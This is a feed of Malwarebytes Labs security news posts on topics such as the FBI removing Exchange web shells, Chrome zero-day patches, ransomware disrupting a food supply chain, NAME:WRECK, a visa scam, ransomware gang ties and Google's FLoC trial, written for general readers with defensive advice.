Malware Bytes

FBI shuts down malware on hundreds of Exchange servers, opens Pandora’s box

Malware Bytes Security - 1 hour 53 min ago

A rather remarkable story has emerged, setting the scene for lively debates about permissible system access. A press release from the US Department of Justice Judge has revealed that the FBI were granted permission to perform some tech support backdoor removal. Bizarrely, they did this without letting the admins know beforehand.

A campaign targeting vulnerable Exchange servers has left web shells scattered everywhere. Those shells are backdoors. They allow attackers to access and creep around inside the compromised networks. Additionally, it seems that not all shells were properly locked down. They fell foul to password reuse. This means criminals figuring out the passwords to other criminals’ web shells could also potentially access the compromised servers. Having those shells lying around on systems for such a long time isn’t a great thing to happen.

When calls to fix systems go unheeded

Despite repeated warnings, and even one-click tools from Microsoft aiming to mitigate the issue, and no small amount of patching, some vulnerable servers remained. Some organisations missed or ignored the mass-massaging about the threat. Or perhaps they just didn’t know what to do to fix the problem. It’s likely that some also patched the vulnerability without also finding and removing the web shells.

This means lots of compromised exchange servers all over the place, just waiting for illicit access to begin all over again. What do you do in this situation? We’ll get to that but before we do, let’s talk about the perils of getting involved in situations. Any situation.

Getting involved in situations. Any situation.

People love to help. Members of the public often get involved in security issues alongside professional researchers and organisations. They may give tip-offs, or send files over, and most commonly, do some work in anti-phishing. It’s fairly easy to do, has a steady stream of ready-made content in their mailboxes to check out, and there’s a lot of places to report it to.

The problem is when individuals who mean well take it a step further without taking appropriate security measures. For example, a popular past time is filling up phish pages with bogus data. This is done to slow down phishers by making their data worthless. If folks aren’t careful, issues can arise.

At the extreme end, the same goes for vigilante style takedown tactics / breaking into servers / deleting data or “hacking back”. It might feel good to wipe large quantities of illegal content from a server you’ve taken control of which belongs to very bad people. But the law of unintended consequences has a way of biting the hand that feeds it. Even if your commands have exactly the effect you expect (and how often does that happen?), in one fell swoop you may have ruined an already ongoing law enforcement investigation, scrubbed the evidence needed to put someone in jail, and now you’re on the wanted list for breaking into a server and doing things you shouldn’t have been.

When the golden rule is broken

The golden “don’t do this” rule is “don’t touch servers and devices you have no permission to access”. It’s a great rule and helps keep people from getting into trouble, and it’s the backbone of computer misuse laws in both the US and the UK.

Where it gets a bit less clear, is when law enforcement agencies are granted permission from a Judge to access previously compromised servers and change things (in this case by deleting web shells). As per the release:

“the FBI conducted the removal by issuing a command through the web shell to the server, which was designed to cause the server to delete only the web shell (identified by its unique file path).”

The release mentions that “hundreds” of vulnerable computers had shells removed. These removals were done upfront with no knowledge of the system owners beforehand, according to the below:

The FBI is attempting to provide notice of the court-authorized operation to all owners or operators of the computers from which it removed the hacking group’s web shells. For those victims with publicly available contact information, the FBI will send an e-mail message from an official FBI e-mail account (@FBI.gov) notifying the victim of the search. For those victims whose contact information is not publicly available, the FBI will send an e-mail message from the same FBI e-mail account to providers (such as a victim’s ISP) who are believed to have that contact information and ask them to provide notice to the victim.

You weren’t home, so we left a message…sort of

It is rather alarming to think that a chunk of these system owners will probably go about their business for years to come with no idea the FBI stopped by to do a bit of digital tidying up. We also wonder how realistic it is to think ISPs will actually do some outreach. Even if they do, the business owners may think the mails are fake. Perhaps they’ll accept them as real, but still have no idea what to do about it. It’s surely unrealistic to think the ISPs will be able to take on an intermediary tech support role in all of this. If the goal is to have ISPs tell affected organisations to get in touch with the FBI directly, that’s still dependent on the victim not ignoring the ISP in the first place.

However you stack it up, it’s a bit of a mess.

“New” changes, a long time coming

The FBI requested a rule change for expanded access powers back in 2014, and it was granted in 2016. Essentially, we’ve known this would happen for some time but perhaps didn’t know quite what form it would take. While coverage of the proposed powers focused on “hacking” systems and talking about the issue in terms of offensive / surveillance capabilities, what we’ve ended up with is something a little different.

At the very least, I don’t think many expected the breakthrough story would be “they cleaned up compromised devices”. The question is, have we seen the opening of a Pandora’s box which really should have stayed shut?

General approval or generally derided?

Many of the arguments against this practice say there’s no real way to know if anything else on the servers was accessed or changed. There’s also the problem that solutions like this tend to breed their own additional complications. Just wait until scammers start pushing “FBI access required: problem detected” messages. It’ll be like the bad old days of fake antivirus pop-ups, except now the law enforcement mentioned is offering to help instead of send you to jail.

On the other hand: despite everyone’s best efforts to notify infected organisations and a massive splash of mainstream media coverage, it’s likely that lots of systems would simply have stayed compromised for a very long time to come if the FBI hadn’t done this. And it isn’t just the organisation that’s targeted that suffers, it’s everyone who depends on that organisation, and everyone who becomes a victim if the compromised system is used to launch further attacks.

So, where does the buck stop, and who specifically is going to stop it? Do you think this was a justified action? Is it acceptable in the most dire of situations, where no help is coming? Does it pave the way for overreach and the feeling your devices are under fire from all quarters?

We’d love to know what you think in the comments.

The post FBI shuts down malware on hundreds of Exchange servers, opens Pandora’s box appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Update now! Chrome needs patching against two in-the-wild exploits

Malware Bytes Security - 3 hours 27 min ago

A day late and a dollar short is a well-known expression that comes in a few variations. But this version has a movie and a book to its name, so I’m going with this one. Why?

Google has published an update for the Chrome browser that patches two newly discovered vulnerabilities. The browser’s Stable channel has been updated to 89.0.4389.128 for Windows, Mac and Linux. Both being exploited in the wild.

Google is aware of reports that exploits for CVE-2021-21206 and CVE-2021-21220 exist in the wild.

Note that other browsers, such as Edge, Brave and Vivaldi are also based on Chrome and likely to be affected by the same issues.

Which vulnerabilities are patched?

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).

The first zero-day was listed as CVE-2021-21220 and was discovered at the Pwn2Own 2021 event last week. The vulnerability is caused by insufficient validation of untrusted input in V8, Google’s high-performance JavaScript and WebAssembly engine that interprets code embedded in web pages.

The second zero-day was listed as CVE-2021-21206 and is described as a “use after free in Blink”. Use after free (UAF) is a vulnerability caused by incorrect use of dynamic memory during a program’s operation. If after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program. Blink is the name of the rendering engine used by Chromium to “draw” web pages.

Why did I say a day late?

Researcher Rajvardhan Agarwal managed to publish a working exploit for CVE-2021-21220 (the vulnerability discovered at Pwn2Own) on GitHub over the weekend, by reverse-engineering a patch produced by the Chromium team. Chromium is the open source browser that Chrome is built upon, and it in turn is made up of components, like V8 and Blink. Fixes appear in Chromium first, and then Google packages them up, along with some Google-specific goodies, into a new version of the Chrome browser.

Just here to drop a chrome 0day. Yes you read that right.https://t.co/sKDKmRYWBP pic.twitter.com/PpVJrVitLR

— Rajvardhan Agarwal (@r4j0x00) April 12, 2021 And why a dollar short?

Because the same researcher stated that (at the time) although the vulnerability affecting Chromium-based browsers had been patched in the latest version of V8, it worked against the current Chrome release, thereby leaving users potentially vulnerable to attacks.

Luckily, although Agarwal proved that exploitation was possible, he stopped short of handing criminals the keys to the entire castle. Purposely, the published exploit only worked if users disabled their browser’s sandbox, a sort of protective software cage that isolates the browser from the rest of the computer and protects it from exactly this kind of exploit. Criminals looking to use his exploit would have to chain it with a sandbox “escape”, a technically difficult task (although not an impossible one, as the Pwn2Own winners proved).

The update

The easiest way to do it is to allow Chrome to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the working exploits. My preferred method is to have Chrome open the page chrome://settings/help which you can also find by clicking Settings > About Chrome.

If there is an update available, Chrome will notify you and start downloading it. Then it will tell you all you have to do to complete the update is Relaunch the browser.

After the update your version should be at 89.0.4389.128 or later

Stay safe, everyone!

The post Update now! Chrome needs patching against two in-the-wild exploits appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Ransomware disrupts food supply chain, Exchange exploitation suspected

Malware Bytes Security - 6 hours 35 min ago

When malware found its way into the network of Bakker Logistiek, a company specializing in the transport and warehousing of food and other products, on the night of 4 to 5 April, its IT systems ground to a halt. And, along with them, the reception of orders from clients, and the delivery of goods to branches of Albert Heijn, the largest supermarket chain in the Netherlands. With systems down, companies affected have resorted to using pen and paper for the time being.

Thankfully, all systems are back online now, according to Bakker Logistiek’s CEO Toon Verhoeven who gave an interview to local news organization, Nederlandse Omroep Stichting (NOS). The company is now in the process of contacting customers so they can begin deliveries as normal.

Verhoeven also confirmed with De Telegraaf, a Dutch morning newspaper, that the malware in question is ransomware, but the variant is yet to be disclosed by the company. “We have filed a complaint and it is now with the judicial authorities,” Verhoeven said in the NOS interview, which we have translated using Google Translate. “We are not making any further statements about that. We have worked very hard over the past six days to get our information systems up and running again.”

One of the foodstuffs most affected by the attack is packaged cheese. Albert Heijn said in a statement that they, too, are working hard to get the availability of cheese both in shops and online, although the latter is still a bit difficult to achieve in terms of ordering. Although headline writers have had some fun with the attacks affect on cheese supplies, the plain fact is that a gang of criminals has successfully disrupted a food supply chain, and that’s no laughing matter.

The CEO suspects that the compromise had something to do with the ProxyLogon vulnerability affecting Microsoft Exchange Servers. You may recall, Microsoft issued patches for four Microsoft Exchange zero-day exploits last month. The flaws were being taken advantage of by an attack group called Hafnium. After news of the patches broke, criminals were quick to reverse engineer the patches and use the vulnerabilities to attack servers, deploy web shells and drop ransomware payloads like Black KingDom and DearCry, knowing that many organizations would be slow to apply the patches.

The attack on Bakker Logistiek is yet another real-world example in the lengthening list of malware attacks affecting vital organizations with major consequences that go beyond the targeted businesses. We’re not even going to take a look back at what happened to Maersk in 2018 when NotPetya struck them hard. Or when EKANS disrupted industrial control systems (ICS) of Honda, GE, and Honeywell.

And it isn’t just businesses. The number of schools and hospitals that have experienced downtime because of ransomware is staggering, with some of them paying the ransom not only to get their systems up and running as quickly as possible but also to get their precious time back. In turn, those ransom payments fund the boom in ransomware.

In all honesty, although we don’t endorse ransom payments, it is not difficult to see why people make the calculation that they should pay, and we wouldn’t have been surprised if Bakker Logistiek had done the same.

As the sophistication of ransomware grows, organizations must continue to take this threat seriously, act swiftly in auditing their security posture as a whole, and plan accordingly. Preparing for ransomware doesn’t just mean beefing up security, it also means having a realistic plan in place for how to recover if the worst does happen, and keeping off-site, air-gapped backups that will be out of any attackers’ reach.

Every organization is a target, and the victims are everyone that relies on that organization. Your organization must be better prepared than ever. You can start by reading our guide to ransomware.

The post Ransomware disrupts food supply chain, Exchange exploitation suspected appeared first on Malwarebytes Labs.

Categories: Malware Bytes

NAME:WRECK, a potential IoT trainwreck

Malware Bytes Security - Tue, 04/13/2021 - 10:52am

A set of vulnerabilities has been found in the way a number of popular TCP/IP stacks handle DNS requests. Potentially this could impact hundreds of millions of servers, smart devices, and industrial equipment. The researchers that discovered the vulnerabilities have named them NAME:WRECK.

Plural vulnerabilities?

Yes, the researchers found 9 DNS-related vulnerabilities that have the potential to allow attackers to take targeted devices offline or to gain control over them. These vulnerabilities affect 4 popular TCP/IP stacks: FreeBSD, IPnet, Nucleus NET, and NetX. Together they are used by over 100 Million devices. Since the vulnerable DNS clients are usually exposed to the internet this creates a huge attack surface.

Some background

Domain Name System (DNS) is an internet protocol that translates user-friendly, readable URLs, like malwarebytes.com, to their numeric IP addresses, like 52.85.104.30, allowing the computer to identify a server without the user having to remember and input its actual IP address. Basically, you could say DNS is the phonebook of the internet. DNS name resolution is a complex process that can be interfered with at many levels.

Although never visible to end-users, TCP/IP stacks are libraries that vendors add to their firmware to support internet connectivity and other networking functions like DNS queries for their devices. These libraries are very small but, in most cases, underpin the most basic functions of a device, and any vulnerability here exposes users to remote attacks.

Devices and organizations affected by NAME:WRECK

FreeBSD is widely used in firewalls and several commercial network appliances. It is also the basis for other well-known open-source projects. The most common device types running FreeBSD include computers, printers and networking equipment.

IPNet tends to be used by internet-facing enterprise devices located at the perimeter of an organization’s network, such as modems, routers, firewalls, and printers, as well as some industrial and medical devices.

The Nucleus RTOS website mentions that more than 3 billion devices use this real-time operating system, such as ultrasound machines, storage systems, critical systems for avionics and others, although presumably many of them are not internet connected.

NetX is usually run by the ThreadX Real Time Operating System (RTOS). Typical applications include medical devices, systems-on-a-chip and several printer models. The most common device types running ThreadX include printers, smart clocks and energy and power equipment in Industrial Control Systems (ICS).

Did you notice how it may turn out that the vertical that has most to fear from these vulnerabilities is a sector that is already under heavy stress, and has been actively targeted by cyberattacks? The healthcare sector is indeed in the top 3 of most affected by these vulnerabilities, together with the government.

Exploitation

For an attacker to use these vulnerabilities they have to find a way to send a malicious packet in reply to a legitimate DNS request. So the attacker will have to run a person-in-the-middle attack or be able to use an existing vulnerability like DNSpooq between the target device and the DNS server to pull this off.

Mitigation

Complete protection against NAME:WRECK requires patching devices running the vulnerable versions of these IP stacks. FreeBSD, Nucleus NET and NetX have been patched recently, and device vendors using this software should provide their own updates to customers.

It is not always easy though for users to find out whether they have the most up to date patches for any devices running across these affected IP Stacks. And patching devices is not always easy, or even possible.

There are a few things you can do however:

  • Make an inventory of the devices running the vulnerable stacks. Forescout Research Labs has released an open-source script that uses active fingerprinting to detect devices running the affected stacks.
  • Keep unpatched devices contained or disconnected from the internet, until they can be patched or replaced.
  • Configure devices to rely on internal DNS servers where possible.
  • Monitor network traffic for malicious packets that try to exploit the vulnerabilities.
  • Apply patches as soon as possible after they have been made available.

For those interested in the full technical details the full report is available here and will be presented at Black Hat Asia 2021.

Stay safe, everyone!

The post NAME:WRECK, a potential IoT trainwreck appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Sorry, Joe Biden isn’t offering you a work visa, it’s a scam

Malware Bytes Security - Tue, 04/13/2021 - 7:02am

A US diplomatic mission in Nigeria warns of a visa scam affecting Nigerian citizens looking to move to the United States. It’s an old scam message, dressed up with a fresh coat of paint. Shall we take a look?

Fraud Alert!

Scammers and fraudsters are circulating a fake “press release” claiming to offer a new type of work visa to Nigerian citizens aged 40-55. It’s the same old scam, but in fresh packaging – don’t become a victim!

— U.S. Mission Nigeria (@USinNigeria) March 25, 2021

Work visa scams are a solid fixture in the scammer’s toolkit. This one blends the pandemic, data harvesting, and a slice of bank account emptying. There’s several variations of the scam, but they follow the same pattern.

The fake e-visa press release

No matter which version you’re looking at, the bogus press release begins as follows:

President Joe Biden, the 46th U.S. President has signed an Executive Order that interested citizens of the Federal Republic of Nigeria who measure in some special professions are eligible for American work E-visa and residence permit. This was communicated to the Nigerian Mission in the United States by the U.S. Department of Immigration.

The terms of the Executive Order allow 25,000 citizens of the Federal Republic of Nigeria between the age of 35 to 55 whose area of expertise are among the following: 1. Health workers, 2. engineers, 3. marine workers, 4. civil servants, 5. business administrators, 6. accountants, 6 [SIC]. lecturers, 7. those with special skills.

The official warning from the embassy warns the target age range is 40 – 55, whereas the example above focuses on those between 35 – 55. There is yet another version discussed here, focusing on potential victims aged between 25 – 55.

Promoting a scam

There’s almost certainly more versions of this scam in circulation by email. The example given by the embassy is a screenshot of a fake press release posted to Instagram. We’ve also discovered another version, again posted to Instagram from another account.

In both cases, the accounts claim to be involved in (or offering) some form of immigration service(s). For other versions of the fake press release, they follow the same template changing details relevant to the scammer’s own interests.

What are they asking for?

No matter who is sending the individual scams, the data they ask for is pretty standard across the board. They want potential victims to either hand over certain documents, or follow some crucial steps:

  1. Passport biodata pages, with “at least 6 months left before expiry date”. A work resume. A passport photograph. Government-issued ID if available. This is classic data harvesting for identity theft or social engineering.
  2. The “brush off”. They claim that if potential victims haven’t heard back after 2-3 business days they should forget the whole thing. The visa won’t be headed their way, and they should simply wave goodbye to the money paid to apply.
  3. A warning that potential victims shouldn’t tell anyone they’ve applied may set off alarm bells for some, but not everyone. “Applicants must go about their applications themselves without involving any third parties such as travel agents, family members living in the United States, or any other delegates”. This is simply so people with more knowledge of procedure don’t declare the whole thing one big scam.
  4. A payment of $250 for an “English proficiency test”. They also ask for a further $150 for “Covid screening” if applicants have not yet had a COVID-19 vaccination.
  5. A deadline. The “Press release” claims to have been signed in February or March depending on which version is on display. All of the ones we’ve seen so far claim the application deadline is the 30th of April, 2021. Is this offer too good to be true? Better hurry up and submit those fees and find out before the opportunity is lost! This is a time-honoured pressure tactic, dusted off and reused once again.
Turning a profit on false hope

This is an awful scam, and the people behind it don’t care about the fallout for victims. They even try and make some additional cash from the pandemic. You can bet that once April 30 passes, new versions will be released with May or June listed as the new cut-off point. We’ve covered the occasional visa scam previously, and they can have serious consequences for people caught in the trap.

If you’re unsure about too-good-to-be-true visa announcements, stick to official sources. Anyone can claim to be anything on social media platforms and mailbox missives. Major changes will have major coverage, and you can always contact the relevant embassy directly in a worst case scenario.

The post Sorry, Joe Biden isn’t offering you a work visa, it’s a scam appeared first on Malwarebytes Labs.

Categories: Malware Bytes

How ransomware gangs are connected, sharing resources and tactics

Malware Bytes Security - Mon, 04/12/2021 - 7:59am

Many of us who read the news daily encounter a regular drum beat of ransomware stories that are both worrying and heartbreaking. And what many of us don’t realize is that they are often interconnected. Some of the gangs behind the ransomware campaigns that we read about have established a relationship among each other that can be described as “being in league with each other”, yet they lack certain elements that might cement their status as a true cartel in the digital underground world.

This is the overall finding of Jon DiMaggio, known cybersecurity luminary and Chief Security Strategist for Analyst1, a threat intelligence company.

In a whitepaper entitled “Ransom Mafia – Analysis of the World’s First Ransomware Cartel”,  DiMaggio and his team aimed to provide an analytical assessment on whether there is indeed a ransomware cartel, or if indications there might be was just something the ransomware gangs fabricated to distract researchers and law enforcement.

The ties that bind

Analyst1 has identified two strong connections among the affiliated groups mentioned in its report that establishes how they work together as something like a cartel. They are:

Shared data leak sites

The gangs within the cartel share information about the companies they have attacked, as well as all the data they have exfiltrated. In one example, the researchers saw Twisted Spider posting victim data gathered by the Lockbit gang and Viking Spider. This is on top of these gangs posting company data onto their respective leak sites.

Shared infrastructure

SunCrypt was found using IP addresses and Command and Control infrastructure tied to Twisted Spider to deliver the ransomware payload in its campaigns. This was observed 10 months after Twisted Spider used them in its operations. This kind of resource sharing can only occur if a relationship of trust has already been established.

Analyst1 has also identified other circumstantial and technical ties among the groups that, on their own, aren’t sufficient measures for precise attribution.

Other noteworthy findings

The research includes several other noteworthy findings:

  • Victim data is not the only thing these affiliate gangs pass between each other. They were also observed sharing tactics, such as the increasing proliferation and persistence of their malware in the wild by making a Ransomware-as-a-Service (RaaS) package available to other criminals, and command and control (C&C) infrastructure.
  • Affiliated gangs appear to be on the move to automate their attacks, in evidence of added automated capabilities found in ransomware payloads. Manually infecting compromised companies is a known hallmark of big game hunting (BGH) ransomware threat actors.
  • Some of the groups involved have opened themselves to media interviews in the past. They also issue their own press releases from their own websites and use multiple means to harass victims into paying up.
  • Affiliated gangs have claimed to be part of a cartel at some point in the past. Although some of them have already denied their connections, evidence contradicts this.
Who is in the cartel?

Analyst1 grouped affiliated ransomware gangs under the “Ransom Cartel” tag. Note, however, that this collective had named themselves the “Maze Cartel” the same year their cooperative relationship had been established.

The breakdown of the said “Ransom Cartel” with the ransomware strains they use. There are at least 4 gang members we know of that are affiliated. The SunCrypt threat actors dissolved in September 2020. (Source: Analyst1)

The Ransom Cartel arose in May 2020. Twisted Spider, the gang behind Maze ransomware and others, is said to be the group that initiated its creation. Their primary motivation was financial gain.

Most of these groups are based in Eastern Europe and they primarily speak Russian, an attribute they don’t hide at all. Some of these groups have developed malware other than ransomware; however, all groups made sure that none of them would affect users in Russia and in the Commonwealth of Independent States (CIS).

Below is a brief overview of the individual groups said to make up the Ransom Cartel (Note that not all of them go for an official name. As such, they are named based on the ransomware variant they use):

Twisted Spider

Other alias(es): Maze Team, FIN6

Malware: Maze ransomware (previously known as ChaCha), Egregor ransomware, Qakbot worm, other commodity exploit kits

Malwarebytes detections: Ransom.Maze, Ransom.Sekhmet, Worm.Qakbot, respectively

LockBit gang

Other alias(es): none

Malware: LockBit ransomware, Hakops keylogger

Malwarebytes detection: Ransom.LockBit, Trojan.Keylogger, respectively

Wizard Spider

Other alias(es): Grim Spider (hailed as a subset of Wizard Spider), UNC1878, TEMP.MixMaster

Malware: TrickBot Trojan, Ryuk ransomware, Conti ransomware, MegaCortex ransomware, BazarLoader backdoor

Malwarebytes detection: Trojan.TrickBot, Ransom.Ryuk, Ransom.Conti, Ransom.MegaCortex, Trojan.Bazar, respectively

Viking Spider

Other alias(es): Ragnar group

Malware: Ragnar locker ransomware

Malwarebytes detection: Ransom.Ragnar

SunCrypt Gang

Other alias(es): none

Malware: SunCrypt ransomware

Malwarebytes detection: Ransom.SunCrypt

“What cartel?”

Although there is indeed trust, and sharing of resources and tactics, among these ransomware gangs, Analyst1 has assessed that the Ransomware Cartel is not a true cartel. Its report concludes that the cooperation it witnessed lacked some of the elements needed to reach the level of a cartel, most notably profit-sharing.

You can read more about the report here.

The post How ransomware gangs are connected, sharing resources and tactics appeared first on Malwarebytes Labs.

Categories: Malware Bytes

How bitcoin payments unmasked a man who hired a Dark Web contract killer

Malware Bytes Security - Mon, 04/12/2021 - 7:02am

An Italian citizen’s apparent attempt to hire a hitman on the Dark Web has been undone by clever analysis of his Bitcoin transactions. The man, who is reported to be an IT worker employed by a major corporation, is alleged to have paid the hitman to assassinate his former girlfriend.

What happened?

According to a news article published by European policing entity Europol on April 7, they assisted Italian communications crime law enforcement Polizia Postale e Delle Comunicazioni in arresting a local citizen suspected of paying about $12,000 USD worth of bitcoin (at the moment of writing) to a Dark Web hitman to kill his ex-girlfriend. The Europol report states that the timely investigation had prevented any harm against the potential victim. The spiteful ex was detained before he paid the entire sum on the verge of the attack.

The agencies

The Polizia Postale e Delle Comunicazioni is a federal department of the Italian police force that is, among others, responsible for solving cybercrimes.

Europol is the European Union Agency for Law Enforcement Cooperation. Headquartered in The Hague, the Netherlands, they assist the EU member states in their fight against serious international crime and terrorism.

The investigation

After being asked for assistance, Europol reportedly carried out an urgent analysis of the Bitcoin transactions to trace the origin. They were able to identify the crypto-asset service provider from which the suspect had acquired the funds. The company that sold the assets confirmed the information provided by the investigators and offered more information about the suspected man.

Unmasking Bitcoin transactions

Europol managed to track down the local cryptocurrency service provider that facilitated the suspect’s Bitcoin purchases to uncover more information about him.

In their press release Europol states:

Europol carried out an urgent, complex crypto-analysis to enable the tracing and identification of the provider from which the suspect purchased the cryptocurrencies.

It was able to do this because Bitcoin transactions are all recorded in a public ledger called a blockchain. The Bitcoin blockchain records every transaction ever made using the currency in its blockchain, making it a perfect source for big data investigations. With the proper tools investigators can follow and back-track payments. Although Bitcoin transactions don’t record the names of the people involved, they do record the wallet addresses that sent or received money. If police can link a wallet address to a real individual, they can trace that individual’s credits and debits.

Exchanges where non-digital money and crypto-currencies get exchanged are an established weak spot in the chain for criminals, since users often have to hand over personally identifiable information before they can use one. If the police can trace bitcoin payments back to a bitcoin purchase at a legitimate exchange they can subpoena the exchange for the bitcoin owner’s personal details.

Unmasking Dark Web activity

The story is a useful reminder that the Dark Web is not as hidden and unconnected as many people think. Connections to the regular web, and the real world, can reveal the things its users are trying to keep hidden. In this case, the arrested man seems to have been unmasked by his connections to currency transactions on the regular web, but there are numerous other pathways from one to the other.

For example, Dark Web sites can reveal their links to hosting companies or regular websites through misconfigured SSL certificates or leaky server-status pages, among other things. And real people can accidentally unmask themselves through any number of mistakes, from EXIF data in photos to reusing their Reddit account username on a Dark Web market.

Investigation tools

There are existing tools and new ones under development that enable investigators to find the type of information that can connect Dark Web operators to a real world identity. Interpol is working with great interest on a Dark Web Monitor to help in criminal investigations that involve Crypto-currencies, PGP, the Dark Web, and other related fields, and the US Defense Advanced Research Projects Agency (DARPA) revealed the existence of its Deep Web search project, Memex, several years ago.

Anonymity and privacy researcher Sarah Jamie Lewis has written a tool called OnionScan to help Dark Web site operators identify the kind of operational security leaks or software misconfigurations, like shared SSH keys, which can connect Dark Web sites to each other, or to clear web sites. You can find information about her work on onionscan.org.

The hitman

It is unknown whether the hitman that offered to carry out the crime has been identified and will be prosecuted. As we have seen in the past, not every hitman on the Dark web does what they were paid for. Obviously we do not condone what this suspect was doing, but there is another lesson to be learned here. It is not safe to assume that you are private on the Dark Web, nor that you will get what you paid for.

The post How bitcoin payments unmasked a man who hired a Dark Web contract killer appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Beating security fatigue with Troy Hunt, Chloé Messdaghi, and Tanya Janca: Lock and Code S02E06

Malware Bytes Security - Mon, 04/12/2021 - 3:05am

This week on Lock and Code, we discuss the top security headlines generated right here on Labs. In addition, we speak to Point3 Security chief strategist Chloé Messdaghi, HaveIBeenPwned founder Troy Hunt, and We Hack Purple founder and CEO Tanya Janca about security fatigue.

Security fatigue is exactly what it sounds like. It’s the limit we all reach when security best practices become overbearing. It’s what prevents us from making a strong password for a new online account. It’s why we may not update our software despite repeated notifications.

And, importantly, it probably isn’t your fault.

Tune in to learn about security fatigue from the experts—how does it manifest in their professions, what have they seen, and what are the unforeseen outcomes to it—on the latest episode of Lock and Code, with host David Ruiz.

https://feed.podbean.com/lockandcode/feed.xml

You can also find us on the Apple iTunes storeSpotify, and Google Podcasts, plus whatever preferred podcast platform you use.

We cover our own research on: Other cybersecurity news:

Stay safe!

The post Beating security fatigue with Troy Hunt, Chloé Messdaghi, and Tanya Janca: Lock and Code S02E06 appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Millions of Chrome users quietly added to Google’s FLoC pilot

Malware Bytes Security - Fri, 04/09/2021 - 9:08am

Last month, Google began a test pilot of its Federated Learning of Cohorts—or FLoC—program, which the company has advertised as the newest, privacy-preserving alternative in Google Chrome to the infamous third-party cookie.

Sounds promising, right? Well, about that.

Despite Google’s rhetoric about maintaining user privacy, its FLoC trial leaves much to be desired. Google Chrome users had no choice in whether they were included in the FLoC trial, they received no individualized notification, and, currently, they have no option to specifically opt-out, instead having to block all third-party cookies on their Google Chrome browsers to leave the trial.

Electronic Frontier Foundation (EFF), which analyzed Google’s published materials and Chromium’s source code to better understand FLoC, lambasted the pilot program and the technology behind it.

“EFF has already written that FLoC is a terrible idea,” the digital rights organization said. “Google’s launch of this trial—without notice to the individuals who will be part of the test, much less their consent—is a concrete breach of user trust in service of a technology that should not exist.”

What is FLoC?

Labored acronyms aside, FLoC is part of Google’s broader plan to develop its idea of a more private web, as the search giant struggles with the death of the most important digital advertising tool in the history of the Internet—the third-party cookie.

We should be clear at the outset here. First-party cookies help the Internet function. Cookies help websites knit web page visits together. First-party cookies are used to knit together different visits to pages on the same website and help them remember useful information such as your settings, what’s in your shopping cart, and—most importantly—whether you are logged in or not.

Third-party cookies can also benefit Internet users, but for years, this technology primarily served as a sort of “tree of life” for the digital advertising economy, allowing advertisers to knit together web page visits from many different websites.

Implanted on millions of popular websites, tracking code that relies on third-party cookies has enabled the profiling of nearly every single Internet user by their age, gender, location, shopping interests, political affiliations, and religious beliefs. Third-party cookies also ushered in the era of “Real-Time Bidding,” in which businesses compete for the opportunity to deliver you ads based on those user profiles. And as online publishers like newspapers struggled to maintain in-print advertising revenue in their decade-long transition to digital, third-party cookies provided a sometimes necessary bargain for those publishers: Sell ad placements not to individual companies, but scale ad revenue rapidly by harnessing the results of mass user profiling.

Without the third-party cookie, much of this activity would either have been delayed or limited. So, too, would the money being made by the developers of those third-party cookies, which include many digital advertising companies and, as it just so happens, one notable Silicon Valley giant—Google.

The obvious question about FLoC technology then is: Why would Google create an alternative to the technology that helps them generate billions of dollars in ad revenue every year?

Because the third-party cookie is dying. As users increasingly protect their online privacy, they continue to install browser plug-ins that block the type of online tracking enabled by third-party cookies. Further, several browsers—including Safari and Mozilla—began blocking third-party cookies by default years ago.

If anything, FLoC is Google’s answer to a future that we all know is coming, in which the third-party cookie has lost its power.

Alright but what actually is FLoC?

How FLoC technology differs from third-party cookies is that, primarily, FLoC will create profiles on groups of users and not profiles on individual users. If FLoC becomes the norm, then Google Chrome users will have their activity tracked by Google Chrome itself. Based on that browsing activity—including what sites are visited and what searches are made—Google Chrome will then group users into “cohorts.” When you visit a website it will be able to ask your browser what cohorts you belong to and deliver ads that advertisers have targeted towards those “cohorts.”

This means that the broader digital advertising ecosystem will remain, but the wheels that churn to move it forward will undergo some changes.

In its FLoC announcement, Google explained that it is trying to find a balance between what it believes is the usefulness and the harm of third-party cookies.

“Keeping in mind the importance of ‘and,’ FLoC is a new approach to interest-based advertising that both improves privacy and gives publishers a tool they need for viable advertising business models,” the company said.

According to Google, FLoC technology will not share your individual browsing history with anyone or any company, including Google. Instead, that activity will be grouped into the activity of thousands of users in a cohort. Further, Google said that its Chrome browser will not create cohorts based on “sensitive topics.” So, that hopefully means that there will not be cohorts for people searching for aid in suicide prevention, domestic abuse, drug addiction, or private medical diagnoses, for example.

According to EFF, though, Google’s FLoC technology includes multiple privacy problems, such as the ability to use FLoC findings in conjunction with browser fingerprinting to reveal information about users, and the potentially never-ending quest to gather user data as a first-stage requirement only to then “unlearn” that user data if it could lead to the creation of a sensitive cohort.

The technical concerns with FLoC are many, but they’re difficult for the average user to grasp. What is easy to understand, however, is how those average users are left behind in Google’s FLoC trial.

A quiet trial

For such a seismic shift in the Internet’s infrastructure, many might assume that Google would announce the FLoC trial with more safeguards.

That’s not what happened.

In Google’s FLoC trial announcement, it gave Google Chrome users no option to opt out before the trial began. Instead, Google silently pushed FLoC technology to Chrome users in the US, Canada, Mexico, Australia, New Zealand, Brazil, India, Japan, Indonesia, and the Philippines. While Google described the trial as affecting a “small percentage of users,” according to EFF, that percentage could be as high as 5 percent.

That sounds small at first, but take into account that nearly-ancient estimates (circa 2016) put active Google Chrome users around 2 billion, meaning that the FLoC trial could affect up to 100 million people. That is an enormous number of people to subject to a data analysis experiment without their prior consent.

Google also said that users can opt-out of the FLoC trial by disabling third-party cookies through Google Chrome. It’s good that such an option exists, but it’s unfortunate that users will have to have some basic understanding of FLoC and third-party cookies to remove themselves from a trial that they might have no knowledge about.

Compounding the issue is that turning off all third-party cookies could remove a good deal of functionality from a user’s web experience. That seems both imprecise and unfair.

Finally, the FLoC trial affects more than browser users—it affects websites, too. Remember those publishers that Google said it would like to help? According to Google, “websites that don’t opt out will be included in the FLoC calculation if Chrome detects that they load ads-related resources”. Some of them have already opposed being automatically included into a technology trial that will result in the profiling of their readers—even if that profiling is supposedly less privacy-invasive.

